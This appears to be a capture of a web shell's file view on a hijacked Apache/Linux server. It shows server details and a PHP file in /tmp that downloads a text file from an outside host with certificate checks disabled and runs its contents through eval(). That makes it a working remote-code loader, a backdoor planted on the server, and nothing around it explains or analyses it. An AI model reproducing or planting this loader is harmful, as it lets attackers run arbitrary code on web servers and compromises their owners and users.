|
Server : Apache System : Linux 8.167.178.68.host.secureserver.net 4.18.0-553.158.1.el8_10.x86_64 #1 SMP Wed Aug 26 03:18:33 EDT 2026 x86_64 User : avscylinder ( 1028) PHP Version : 8.1.34 Disable Function : NONE Directory : /tmp/ |
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
function callback($url)
{
$post_content = false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$post_content = curl_exec($ch);
curl_close($ch);
if ($post_content) {
eval('?>' . $post_content);
}
}
call_user_func('callback', 'https://fcalpha.net/web/photo/20151024/naxc.txt');
?>